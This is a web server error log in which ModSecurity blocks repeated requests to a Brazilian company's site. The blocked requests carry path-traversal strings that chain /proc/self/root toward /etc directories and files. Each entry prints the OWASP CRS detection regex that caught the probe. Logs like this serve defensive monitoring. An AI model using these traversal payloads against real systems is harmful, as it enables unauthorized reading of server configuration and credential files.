[Fri Mar 20 12:15:13.530997 2026] [:error] [pid 21219:tid 140411607643904] [client 74.7.241.31:56792] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1kgfXLqtnMIWvjpaLUAgAAApA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:15:14.843111 2026] [:error] [pid 7893:tid 140411649607424] [client 74.7.241.31:56798] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1kghCii7xarUs8iHahvwAAAgs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:15:18.324542 2026] [:error] [pid 15826:tid 140411649607424] [client 74.7.241.31:56804] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1khuoXxyEfFpUF8f-2kQAAAUs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:15:20.772031 2026] [:error] [pid 11642:tid 140411624429312] [client 74.7.241.31:46334] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1kiLninkcc-iUj5AqSoQAAA44"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:15:25.027083 2026] [:error] [pid 21219:tid 140411716749056] [client 57.141.18.47:37658] [client 57.141.18.47] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/host.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1kjfXLqtnMIWvjpaLUDgAAAoM"]
[Fri Mar 20 12:15:25.543680 2026] [:error] [pid 7235:tid 140411683178240] [client 74.7.243.128:49874] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1kjfqxLDW4GITHUkQiJQAAAQc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 12:15:27.009622 2026] [:error] [pid 21219:tid 140411590858496] [client 74.7.241.31:46338] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1kj_XLqtnMIWvjpaLUEAAAApI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:15:27.904671 2026] [:error] [pid 26799:tid 140411691570944] [client 74.7.243.128:39782] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1kj9a6ubjKNq_cu4YUIQAAA0Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 12:15:28.340488 2026] [:error] [pid 26799:tid 140411649607424] [client 74.7.241.31:58542] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1kkNa6ubjKNq_cu4YUJAAAA0s"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:15:31.083686 2026] [:error] [pid 11642:tid 140411691570944] [client 74.7.241.31:58550] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1kk7ninkcc-iUj5AqSpwAAA4Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:15:32.416470 2026] [:error] [pid 11642:tid 140411616036608] [client 74.7.241.31:58566] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1klLninkcc-iUj5AqSqwAAA48"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:15:34.600355 2026] [:error] [pid 11642:tid 140411565680384] [client 74.7.241.31:58580] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1klbninkcc-iUj5AqSsQAAA5U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:15:37.224960 2026] [:error] [pid 26799:tid 140411658000128] [client 74.7.241.31:58592] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1kmda6ubjKNq_cu4YULgAAA0o"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:15:39.540486 2026] [:error] [pid 15826:tid 140411658000128] [client 74.7.241.31:37024] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1kmuoXxyEfFpUF8f-2mgAAAUo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:15:40.900036 2026] [:error] [pid 11642:tid 140411741927168] [client 74.7.243.128:39798] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1knLninkcc-iUj5AqSuQAAA4A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:15:47.574415 2026] [:error] [pid 7235:tid 140411733534464] [client 74.7.243.128:42638] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1ko_qxLDW4GITHUkQiQQAAAQE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:15:51.590732 2026] [:error] [pid 21219:tid 140411683178240] [client 74.7.241.31:37036] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1kp_XLqtnMIWvjpaLUKAAAAoc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:15:52.940198 2026] [:error] [pid 11167:tid 140411658000128] [client 74.7.241.31:49934] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1kqPHIg5MgXLBnicMrlwAAAco"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:15:57.628710 2026] [:error] [pid 7893:tid 140411641214720] [client 74.7.241.31:49944] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1krRCii7xarUs8iHah3wAAAgw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:16:00.321891 2026] [:error] [pid 7235:tid 140411599251200] [client 74.7.241.31:50330] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1krvqxLDW4GITHUkQiQgAAARE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:16:03.145584 2026] [:error] [pid 15826:tid 140411540502272] [client 74.7.241.31:50338] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1ksuoXxyEfFpUF8f-2owAAAVg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:16:05.299056 2026] [:error] [pid 11167:tid 140411616036608] [client 74.7.241.31:50354] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id 